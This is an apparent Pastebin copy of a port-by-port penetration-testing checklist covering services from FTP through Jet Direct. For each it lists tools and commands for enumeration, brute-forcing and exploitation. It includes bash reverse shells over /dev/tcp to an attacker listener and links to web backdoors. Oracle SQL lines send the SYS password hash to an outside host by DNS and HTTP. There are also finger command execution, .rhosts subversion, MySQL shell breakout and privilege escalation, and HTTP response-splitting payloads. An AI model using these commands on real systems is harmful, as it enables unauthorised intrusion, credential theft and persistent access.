Guest User

Untitled

a guest
Mar 16th, 2018
528
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.32 KB | None | 0 0
  1. Enumeration
  2. FTP port 21 open
  3. Fingerprint server
  4. telnet ip_address 21 (Banner grab)
  5. Run command ftp ip_address
  6. ftp@example.com
  7. Check for anonymous access
  8. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
  9. Password guessing
  10. Hydra brute force
  11. medusa
  12. Brutus
  13. Examine configuration files
  14. ftpusers
  15. ftp.conf
  16. proftpd.conf
  17. MiTM
  18. pasvagg.pl
  19. SSH port 22 open
  20. Fingerprint server
  21. telnet ip_address 22 (banner grab)
  22. scanssh
  23. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
  24. Password guessing
  25. ssh root@ip_address
  26. guess-who
  27. ./b -l username -h ip_address -p 22 -2 < password_file_location
  28. Hydra brute force
  29. brutessh
  30. Ruby SSH Bruteforcer
  31. Examine configuration files
  32. ssh_config
  33. sshd_config
  34. authorized_keys
  35. ssh_known_hosts
  36. .shosts
  37. SSH Client programs
  38. tunnelier
  39. winsshd
  40. putty
  41. winscp
  42. Telnet port 23 open
  43. Fingerprint server
  44. telnet ip_address
  45. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
  46. telnetfp
  47. Password Attack
  48. Common passwords
  49. Hydra brute force
  50. Brutus
  51. telnet -l "-froot" hostname (Solaris 10+)
  52. Examine configuration files
  53. /etc/inetd.conf
  54. /etc/xinetd.d/telnet
  55. /etc/xinetd.d/stelnet
  56. Sendmail Port 25 open
  57. Fingerprint server
  58. telnet ip_address 25 (banner grab)
  59. Mail Server Testing
  60. Enumerate users
  61. VRFY username (verifies if username exists - enumeration of accounts)
  62. EXPN username (verifies if username is valid - enumeration of accounts)
  63. Mail Spoof Test
  64. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
  65. Mail Relay Test
  66. HELO anything
  67. Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
  68. Unknown domain - mail from: <user@unknown_domain>
  69. Domain not present - mail from: <user@localhost>
  70. Domain not supplied - mail from: <user>
  71. Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
  72. Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
  73. Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
  74. User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
  75. Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
  76. Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
  77. Examine Configuration Files
  78. sendmail.cf
  79. submit.cf
  80. DNS port 53 open
  81. Fingerprint server/ service
  82. host
  83. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
  84. nslookup
  85. nslookup [ -option ... ] [ host-to-find | - [ server ]]
  86. dig
  87. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
  88. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
  89. DNS Enumeration
  90. Bile Suite
  91. perl BiLE.pl [website] [project_name]
  92. perl BiLE-weigh.pl [website] [input file]
  93. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
  94. perl vet-mx.pl [input file] [true domain file] [output file]
  95. perl exp-tld.pl [input file] [output file]
  96. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
  97. perl qtrace.pl [ip_address_file] [output_file]
  98. perl jarf-rev [subnetblock] [nameserver]
  99. txdns
  100. txdns -rt -t domain_name
  101. txdns -x 50 -bb domain_name
  102. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
  103. Examine Configuration Files
  104. host.conf
  105. resolv.conf
  106. named.conf
  107. TFTP port 69 open
  108. TFTP Enumeration
  109. tftp ip_address PUT local_file
  110. tftp ip_address GET conf.txt (or other files)
  111. Solarwinds TFTP server
  112. tftp – i <IP> GET /etc/passwd (old Solaris)
  113. TFTP Bruteforcing
  114. TFTP bruteforcer
  115. Cisco-Torch
  116. Finger Port 79 open
  117. User enumeration
  118. finger 'a b c d e f g h' @example.com
  119. finger admin@example.com
  120. finger user@example.com
  121. finger 0@example.com
  122. finger .@example.com
  123. finger **@example.com
  124. finger test@example.com
  125. finger @example.com
  126. Command execution
  127. finger "|/bin/id@example.com"
  128. finger "|/bin/ls -a /@example.com"
  129. Finger Bounce
  130. finger user@host@victim
  131. finger @internal@external
  132. Web Ports 80, 8080 etc. open
  133. Fingerprint server
  134. Telnet ip_address port
  135. Firefox plugins
  136. All
  137. firecat
  138. Specific
  139. add n edit cookies
  140. asnumber
  141. header spy
  142. live http headers
  143. shazou
  144. web developer
  145. Crawl website
  146. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
  147. httprint
  148. Metagoofil
  149. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  150. Web Directory enumeration
  151. Nikto
  152. nikto [-h target] [options]
  153. DirBuster
  154. Wikto
  155. Goolag Scanner
  156. Vulnerability Assessment
  157. Manual Tests
  158. Default Passwords
  159. Install Backdoors
  160. ASP
  161. http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
  162. Assorted
  163. http://michaeldaw.org/projects/web-backdoor-compilation/
  164. http://open-labs.org/hacker_webkit02.tar.gz
  165. Perl
  166. http://home.arcor.de/mschierlm/test/pmsh.pl
  167. http://pentestmonkey.net/tools/perl-reverse-shell/
  168. http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
  169. PHP
  170. http://php.spb.ru/remview/
  171. http://pentestmonkey.net/tools/php-reverse-shell/
  172. http://pentestmonkey.net/tools/php-findsock-shell/
  173. Python
  174. http://matahari.sourceforge.net/
  175. TCL
  176. http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
  177. Bash Connect Back Shell
  178. GnuCitizen
  179. Atttack Box: nc -l -p Port -vvv
  180. Victim: $ exec 5<>/dev/tcp/IP_Address/Port
  181. Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
  182. Neohapsis
  183. Atttack Box: nc -l -p Port -vvv
  184. Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
  185. Victim: $ exec 1>&0 # Next we copy stdin to stdout
  186. Victim: $ exec 2>&0 # And finally stdin to stderr
  187. Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
  188. Method Testing
  189. nc IP_Adress Port
  190. HEAD / HTTP/1.0
  191. OPTIONS / HTTP/1.0
  192. PROPFIND / HTTP/1.0
  193. TRACE / HTTP/1.1
  194. PUT http://Target_URL/FILE_NAME
  195. POST http://Target_URL/FILE_NAME HTTP/1.x
  196. Upload Files
  197. curl
  198. curl -u <username:password> -T file_to_upload <Target_URL>
  199. curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
  200. put.pl
  201. put.pl -h target -r /remote_file_name -f local_file_name
  202. webdav
  203. cadaver
  204. View Page Source
  205. Hidden Values
  206. Developer Remarks
  207. Extraneous Code
  208. Passwords!
  209. Input Validation Checks
  210. NULL or null
  211. Possible error messages returned.
  212. ' , " , ; , <!
  213. Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
  214. – , = , + , "
  215. Used to craft SQL Injection queries.
  216. ‘ , &, ! , ¦ , < , >
  217. Used to find command execution vulnerabilities.
  218. "><script>alert(1)</script>
  219. Basic Cross-Site Scripting Checks.
  220. %0d%0a
  221. Carriage Return (%0d) Line Feed (%0a)
  222. HTTP Splitting
  223. language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  224. i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
  225. Cache Poisoning
  226. language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  227. %7f , %ff
  228. byte-length overflows; maximum 7- and 8-bit values.
  229. -1, other
  230. Integer and underflow vulnerabilities.
  231. %n , %x , %s
  232. Testing for format string vulnerabilities.
  233. ../
  234. Directory Traversal Vulnerabilities.
  235. % , _, *
  236. Wildcard characters can sometimes present DoS issues or information disclosure.
  237. Ax1024+
  238. Overflow vulnerabilities.
  239. Automated table and column iteration
  240. orderby.py
  241. ./orderby.py www.site.com/index.php?id=
  242. d3sqlfuzz.py
  243. ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
  244. Vulnerability Scanners
  245. Acunetix
  246. Grendelscan
  247. NStealth
  248. Obiwan III
  249. w3af
  250. Specific Applications/ Server Tools
  251. Domino
  252. dominoaudit
  253. dominoaudit.pl [options] -h <IP>
  254. Joomla
  255. cms_few
  256. ./cms.py <site-name>
  257. joomsq
  258. ./joomsq.py <IP>
  259. joomlascan
  260. ./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
  261. joomscan
  262. ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
  263. jscan
  264. jscan.pl -f hostname
  265. (shell.txt required)
  266. aspaudit.pl
  267. asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
  268. Vbulletin
  269. vbscan.py
  270. vbscan.py <host> <port> -v
  271. vbscan.py -update
  272. ZyXel
  273. zyxel-bf.sh
  274. snmpwalk
  275. snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
  276. snmpget
  277. snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  278. Proxy Testing
  279. Burpsuite
  280. Crowbar
  281. Interceptor
  282. Paros
  283. Requester Raw
  284. Suru
  285. WebScarab
  286. Examine configuration files
  287. Generic
  288. Examine httpd.conf/ windows config files
  289. JBoss
  290. JMX Console http://<IP>:8080/jmxconcole/
  291. War File
  292. Joomla
  293. configuration.php
  294. diagnostics.php
  295. joomla.inc.php
  296. config.inc.php
  297. Mambo
  298. configuration.php
  299. config.inc.php
  300. Wordpress
  301. setup-config.php
  302. wp-config.php
  303. ZyXel
  304. /WAN.html (contains PPPoE ISP password)
  305. /WLAN_General.html and /WLAN.html (contains WEP key)
  306. /rpDyDNS.html (contains DDNS credentials)
  307. /Firewall_DefPolicy.html (Firewall)
  308. /CF_Keyword.html (Content Filter)
  309. /RemMagWWW.html (Remote MGMT)
  310. /rpSysAdmin.html (System)
  311. /LAN_IP.html (LAN)
  312. /NAT_General.html (NAT)
  313. /ViewLog.html (Logs)
  314. /rpFWUpload.html (Tools)
  315. /DiagGeneral.html (Diagnostic)
  316. /RemMagSNMP.html (SNMP Passwords)
  317. /LAN_ClientList.html (Current DHCP Leases)
  318. Config Backups
  319. /RestoreCfg.html
  320. /BackupCfg.html
  321. Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
  322. ZyXEL Config Reader
  323. Examine web server logs
  324. c:\winnt\system32\Logfiles\W3SVC1
  325. awk -F " " '{print $3,$11} filename | sort | uniq
  326. References
  327. White Papers
  328. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
  329. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
  330. Blind Security Testing - An Evolutionary Approach
  331. Command Injection in XML Signatures and Encryption
  332. Input Validation Cheat Sheet
  333. SQL Injection Cheat Sheet
  334. Books
  335. Hacking Exposed Web 2.0
  336. Hacking Exposed Web Applications
  337. The Web Application Hacker's Handbook
  338. Exploit Frameworks
  339. Brute-force Tools
  340. Acunetix
  341. Metasploit
  342. w3af
  343. Portmapper port 111 open
  344. rpcdump.py
  345. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
  346. rpcinfo
  347. rpcinfo [options] IP_Address
  348. NTP Port 123 open
  349. NTP Enumeration
  350. ntpdc -c monlist IP_ADDRESS
  351. ntpdc -c sysinfo IP_ADDRESS
  352. ntpq
  353. host
  354. hostname
  355. ntpversion
  356. readlist
  357. version
  358. Examine configuration files
  359. ntp.conf
  360. NetBIOS Ports 135-139,445 open
  361. NetBIOS enumeration
  362. Enum
  363. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
  364. Null Session
  365. net use \\192.168.1.1\ipc$ "" /u:""
  366. net view \\ip_address
  367. Dumpsec
  368. Smbclient
  369. smbclient -L //server/share password options
  370. Superscan
  371. Enumeration tab.
  372. user2sid/sid2user
  373. Winfo
  374. NetBIOS brute force
  375. Hydra
  376. Brutus
  377. Cain & Abel
  378. getacct
  379. NAT (NetBIOS Auditing Tool)
  380. Examine Configuration Files
  381. Smb.conf
  382. lmhosts
  383. SNMP port 161 open
  384. Default Community Strings
  385. public
  386. private
  387. cisco
  388. cable-docsis
  389. ILMI
  390. MIB enumeration
  391. Windows NT
  392. .1.3.6.1.2.1.1.5 Hostnames
  393. .1.3.6.1.4.1.77.1.4.2 Domain Name
  394. .1.3.6.1.4.1.77.1.2.25 Usernames
  395. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  396. .1.3.6.1.4.1.77.1.2.27 Share Information
  397. Solarwinds MIB walk
  398. Getif
  399. snmpwalk
  400. snmpwalk -v <Version> -c <Community string> <IP>
  401. Snscan
  402. Applications
  403. ZyXel
  404. snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
  405. snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
  406. SNMP Bruteforce
  407. onesixtyone
  408. onesixytone -c SNMP.wordlist <IP>
  409. cat
  410. ./cat -h <IP> -w SNMP.wordlist
  411. Solarwinds SNMP Brute Force
  412. ADMsnmp
  413. Examine SNMP Configuration files
  414. snmp.conf
  415. snmpd.conf
  416. snmp-config.xml
  417. LDAP Port 389 Open
  418. ldap enumeration
  419. ldapminer
  420. ldapminer -h ip_address -p port (not required if default) -d
  421. luma
  422. Gui based tool
  423. ldp
  424. Gui based tool
  425. openldap
  426. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
  427. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  428. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
  429. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  430. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
  431. ldap brute force
  432. bf_ldap
  433. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
  434. K0ldS
  435. LDAP_Brute.pl
  436. Examine Configuration Files
  437. General
  438. containers.ldif
  439. ldap.cfg
  440. ldap.conf
  441. ldap.xml
  442. ldap-config.xml
  443. ldap-realm.xml
  444. slapd.conf
  445. IBM SecureWay V3 server
  446. V3.sas.oc
  447. Microsoft Active Directory server
  448. msadClassesAttrs.ldif
  449. Netscape Directory Server 4
  450. nsslapd.sas_at.conf
  451. nsslapd.sas_oc.conf
  452. OpenLDAP directory server
  453. slapd.sas_at.conf
  454. slapd.sas_oc.conf
  455. Sun ONE Directory Server 5.1
  456. 75sas.ldif
  457. PPTP/L2TP/VPN port 500/1723 open
  458. Enumeration
  459. ike-scan
  460. ike-probe
  461. Brute-Force
  462. ike-crack
  463. Reference Material
  464. PSK cracking paper
  465. SecurityFocus Infocus
  466. Scanning a VPN Implementation
  467. Modbus port 502 open
  468. modscan
  469. rlogin port 513 open
  470. Rlogin Enumeration
  471. Find the files
  472. find / -name .rhosts
  473. locate .rhosts
  474. Examine Files
  475. cat .rhosts
  476. Manual Login
  477. rlogin hostname -l username
  478. rlogin <IP>
  479. Subvert the files
  480. echo ++ > .rhosts
  481. Rlogin Brute force
  482. Hydra
  483. rsh port 514 open
  484. Rsh Enumeration
  485. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
  486. Rsh Brute Force
  487. rsh-grind
  488. Hydra
  489. medusa
  490. SQL Server Port 1433 1434 open
  491. SQL Enumeration
  492. piggy
  493. SQLPing
  494. sqlping ip_address/hostname
  495. SQLPing2
  496. SQLPing3
  497. SQLpoke
  498. SQL Recon
  499. SQLver
  500. SQL Brute Force
  501. SQLPAT
  502. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
  503. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
  504. SQL Dict
  505. SQLAT
  506. Hydra
  507. SQLlhf
  508. ForceSQL
  509. Citrix port 1494 open
  510. Citrix Enumeration
  511. Default Domain
  512. Published Applications
  513. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
  514. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
  515. Citrix Brute Force
  516. bforce.js
  517. connect.js
  518. Citrix Brute-forcer
  519. Reference Material
  520. Hacking Citrix - the legitimate backdoor
  521. Hacking Citrix - the forceful way
  522. Oracle Port 1521 Open
  523. Oracle Enumeration
  524. oracsec
  525. Repscan
  526. Sidguess
  527. Scuba
  528. DNS/HTTP Enumeration
  529. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
  530. SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
  531. WinSID
  532. Oracle default password list
  533. TNSVer
  534. tnsver host [port]
  535. TCP Scan
  536. Oracle TNSLSNR
  537. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
  538. TNSCmd
  539. perl tnscmd.pl -h ip_address
  540. perl tnscmd.pl version -h ip_address
  541. perl tnscmd.pl status -h ip_address
  542. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
  543. LSNrCheck
  544. Oracle Security Check (needs credentials)
  545. OAT
  546. sh opwg.sh -s ip_address
  547. opwg.bat -s ip_address
  548. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
  549. OScanner
  550. sh oscanner.sh -s ip_address
  551. oscanner.exe -s ip_address
  552. sh reportviewer.sh oscanner_saved_file.xml
  553. reportviewer.exe oscanner_saved_file.xml
  554. NGS Squirrel for Oracle
  555. Service Register
  556. Service-register.exe ip_address
  557. PLSQL Scanner 2008
  558. Oracle Brute Force
  559. OAK
  560. ora-getsid hostname port sid_dictionary_list
  561. ora-auth-alter-session host port sid username password sql
  562. ora-brutesid host port start
  563. ora-pwdbrute host port sid username password-file
  564. ora-userenum host port sid userlistfile
  565. ora-ver -e (-f -l -a) host port
  566. breakable (Targets Application Server Port)
  567. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
  568. SQLInjector (Targets Application Server Port)
  569. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
  570. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
  571. Check Password
  572. orabf
  573. orabf [hash]:[username] [options]
  574. thc-orakel
  575. Cracker
  576. Client
  577. Crypto
  578. DBVisualisor
  579. Sql scripts from pentest.co.uk
  580. Manual sql input of previously reported vulnerabilties
  581. Oracle Reference Material
  582. Understanding SQL Injection
  583. SQL Injection walkthrough
  584. SQL Injection by example
  585. Advanced SQL Injection in Oracle databases
  586. Blind SQL Injection
  587. SQL Cheatsheets
  588. http://ha.ckers.org/sqlinjection
  589. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  590. http://www.0x000000.com/?i=14
  591. http://pentestmonkey.net/
  592. NFS Port 2049 open
  593. NFS Enumeration
  594. showmount -e hostname/ip_address
  595. mount -t nfs ip_address:/directory_found_exported /local_mount_point
  596. NFS Brute Force
  597. Interact with NFS share and try to add/delete
  598. Exploit and Confuse Unix
  599. Examine Configuration Files
  600. /etc/exports
  601. /etc/lib/nfs/xtab
  602. Compaq/HP Insight Manager Port 2301,2381open
  603. HP Enumeration
  604. Authentication Method
  605. Host OS Authentication
  606. Default Authentication
  607. Default Passwords
  608. Wikto
  609. Nstealth
  610. HP Bruteforce
  611. Hydra
  612. Acunetix
  613. Examine Configuration Files
  614. path.properties
  615. mx.log
  616. CLIClientConfig.cfg
  617. database.props
  618. pg_hba.conf
  619. jboss-service.xml
  620. .namazurc
  621. MySQL port 3306 open
  622. Enumeration
  623. nmap -A -n -p3306 <IP Address>
  624. nmap -A -n -PN --script:ALL -p3306 <IP Address>
  625. telnet IP_Address 3306
  626. use test; select * from test;
  627. To check for other DB's -- show databases
  628. Administration
  629. MySQL Network Scanner
  630. MySQL GUI Tools
  631. mysqlshow
  632. mysqlbinlog
  633. Manual Checks
  634. Default usernames and passwords
  635. username: root password:
  636. testing
  637. mysql -h <Hostname> -u root
  638. mysql -h <Hostname> -u root
  639. mysql -h <Hostname> -u root@localhost
  640. mysql -h <Hostname>
  641. mysql -h <Hostname> -u ""@localhost
  642. Configuration Files
  643. Operating System
  644. windows
  645. config.ini
  646. my.ini
  647. windows\my.ini
  648. winnt\my.ini
  649. <InstDir>/mysql/data/
  650. unix
  651. my.cnf
  652. /etc/my.cnf
  653. /etc/mysql/my.cnf
  654. /var/lib/mysql/my.cnf
  655. ~/.my.cnf
  656. /etc/my.cnf
  657. Command History
  658. ~/.mysql.history
  659. Log Files
  660. connections.log
  661. update.log
  662. common.log
  663. To run many sql commands at once -- mysql -u username -p < manycommands.sql
  664. MySQL data directory (Location specified in my.cnf)
  665. Parent dir = data directory
  666. mysql
  667. test
  668. information_schema (Key information in MySQL)
  669. Complete table list -- select table_schema,table_name from tables;
  670. Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
  671. File privileges -- select user,file_priv from mysql.user where user='root';
  672. Version -- select version();
  673. Load a specific file -- SELECT LOAD_FILE('FILENAME');
  674. SSL Check
  675. mysql> show variables like 'have_openssl';
  676. If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
  677. Privilege Escalation
  678. Current Level of access
  679. mysql>select user();
  680. mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
  681. Access passwords
  682. mysql> use mysql
  683. mysql> select user,password from user;
  684. Create a new user and grant him privileges
  685. mysql>create user test identified by 'test';
  686. mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
  687. Break into a shell
  688. mysql> \! cat /etc/passwd
  689. mysql> \! bash
  690. SQL injection
  691. mysql-miner.pl
  692. mysql-miner.pl http://target/ expected_string database
  693. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
  694. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  695. References.
  696. Design Weaknesses
  697. MySQL running as root
  698. Exposed publicly on Internet
  699. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
  700. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
  701. RDesktop port 3389 open
  702. Rdesktop Enumeration
  703. Remote Desktop Connection
  704. Rdestop Bruteforce
  705. TSGrinder
  706. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
  707. Tscrack
  708. Sybase Port 5000+ open
  709. Sybase Enumeration
  710. sybase-version ip_address from NGS
  711. Sybase Vulnerability Assessment
  712. Use DBVisualiser
  713. Sybase Security checksheet
  714. Copy output into excel spreadsheet
  715. Evaluate mis-configured parameters
  716. Manual sql input of previously reported vulnerabilties
  717. Advanced SQL Injection in SQL Server
  718. More Advanced SQL Injection
  719. NGS Squirrel for Sybase
  720. SIP Port 5060 open
  721. SIP Enumeration
  722. netcat
  723. nc IP_Address Port
  724. sipflanker
  725. python sipflanker.py 192.168.1-254
  726. Sipscan
  727. smap
  728. smap IP_Address/Subnet_Mask
  729. smap -o IP_Address/Subnet_Mask
  730. smap -l IP_Address
  731. SIP Packet Crafting etc.
  732. sipsak
  733. Tracing paths: - sipsak -T -s sip:usernaem@domain
  734. Options request:- sipsak -vv -s sip:username@domain
  735. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
  736. siprogue
  737. SIP Vulnerability Scanning/ Brute Force
  738. tftp bruteforcer
  739. Default dictionary file
  740. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
  741. VoIPaudit
  742. SiVuS
  743. Examine Configuration Files
  744. SIPDefault.cnf
  745. asterisk.conf
  746. sip.conf
  747. phone.conf
  748. sip_notify.conf
  749. <Ethernet address>.cfg
  750. 000000000000.cfg
  751. phone1.cfg
  752. sip.cfg etc. etc.
  753. VNC port 5900^ open
  754. VNC Enumeration
  755. Scans
  756. 5900^ for direct access.5800 for HTTP access.
  757. VNC Brute Force
  758. Password Attacks
  759. Remote
  760. Password Guess
  761. vncrack
  762. Password Crack
  763. vncrack
  764. Packet Capture
  765. Phosshttp://www.phenoelit.de/phoss
  766. Local
  767. Registry Locations
  768. \HKEY_CURRENT_USER\Software\ORL\WinVNC3
  769. \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
  770. Decryption Key
  771. 0x238210763578887
  772. Exmine Configuration Files
  773. .vnc
  774. /etc/vnc/config
  775. $HOME/.vnc/config
  776. /etc/sysconfig/vncservers
  777. /etc/vnc.conf
  778. X11 port 6000^ open
  779. X11 Enumeration
  780. List open windows
  781. Authentication Method
  782. Xauth
  783. Xhost
  784. X11 Exploitation
  785. xwd
  786. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
  787. Keystrokes
  788. Received
  789. Transmitted
  790. Screenshots
  791. xhost +
  792. Examine Configuration Files
  793. /etc/Xn.hosts
  794. /usr/lib/X11/xdm
  795. Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
  796. /usr/lib/X11/xdm/xsession
  797. /usr/lib/X11/xdm/xsession-remote
  798. /usr/lib/X11/xdm/xsession.0
  799. /usr/lib/X11/xdm/xdm-config
  800. DisplayManager*authorize:on
  801. Tor Port 9001, 9030 open
  802. Tor Node Checker
  803. Ip Pages
  804. Kewlio.net
  805. nmap NSE script
  806. Jet Direct 9100 open
  807. hijetta
  808. 0DaySecurity.com © 2009. All Rights Reserved
Add Comment
Please, Sign In to add comment